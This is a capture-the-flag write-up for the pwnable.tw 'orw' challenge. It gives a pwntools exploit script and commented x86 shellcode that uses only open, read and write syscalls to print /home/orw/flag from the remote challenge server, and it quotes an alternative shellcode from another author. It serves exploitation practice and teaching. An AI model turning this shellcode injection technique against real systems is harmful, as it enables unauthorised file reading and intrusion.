Challenge 2. orw (pwnable.tw)

❯ file orw
orw: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e60ecccd9d01c8217387e8b77e9261a1f36b5030, not stripped
❯ checksec orw
[*] '/root/share/pwn/work/pwnable.tw/2.orw/orw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

输入编写的shellcode，并执行getshel。
提示: Read the flag from /home/orw/flag. Only open read write syscall are allowed to use.

sys_open(eax=0x5, ebx=file_addr_str)
sys_read(eax=0x3, ecx=ebx(buff_addr), ebx=0x3(fd), edx=0x50(len))
sys_write(eax=0x4, ebx=0x1(fd))

#!/usr/bin/env python
# coding=utf-8

from pwn import *

#io = process('./orw')
io = remote("chall.pwnable.tw",10001)

shellcode = asm("""
                xor     eax, eax
                xor     ecx, ecx
                mov     eax, 0x5
                push    ecx
                push 	0x67616c66       
                push 	0x2f77726f       
                push 	0x2f656d6f       
                push 	0x682f2f2f
                mov     ebx, esp
                int     0x80
                mov     eax, 0x3
                mov     ecx, ebx
                mov     ebx, 0x3
                mov     dl, 0x50
                int     0x80
                mov     eax, 0x4
                mov     bl, 0x1
                int     0x80
                """)

io.sendafter("Give my your shellcode:", shellcode)
io.interactive()

; syscall: open('/home/orw/flag')
xor     eax, eax
xor     ecx, ecx
mov     eax, 0x5

push    ecx         ; \x00 string end
push 	0x67616c66  ; flag
push 	0x2f77726f  ; orw/
push 	0x2f656d6f  ; ome/     
push 	0x682f2f2f  ; ///h
mov     ebx, esp
int     0x80

; syscall: read
mov     eax, 0x3
mov     ecx, ebx ; ebx is the buf addr
mov     bl, 0x3 ; fd: 0,1,2,3->file
mov     dl, 0x50 ; len
int     0x80

; syscall: write
mov     eax, 0x4
mov     bl, 0x1 ; fd: stdout
int     0x80

Other wps
Reference: https://pwnable.tw/writeup/2/184 by akiym

.intel_syntax noprefix
.globl _start
_start:
    jmp loadstring
file_read:
    pop ebx
    xor eax,eax
    xor ecx,ecx
    xor edx,edx
    mov al,0x5
    int 0x80

    mov ebx,eax
    mov ecx,esp
    mov dl,0x40
    mov al,0x3
    int 0x80

    xchg eax,edx
    mov bl,0x1
    mov al,0x4
    int 0x80

    ret
loadstring:
    call file_read
    .asciz "/home/orw/flag"

% asm -i sc.S -o sc
% nc chall.pwnable.tw 10001 < sc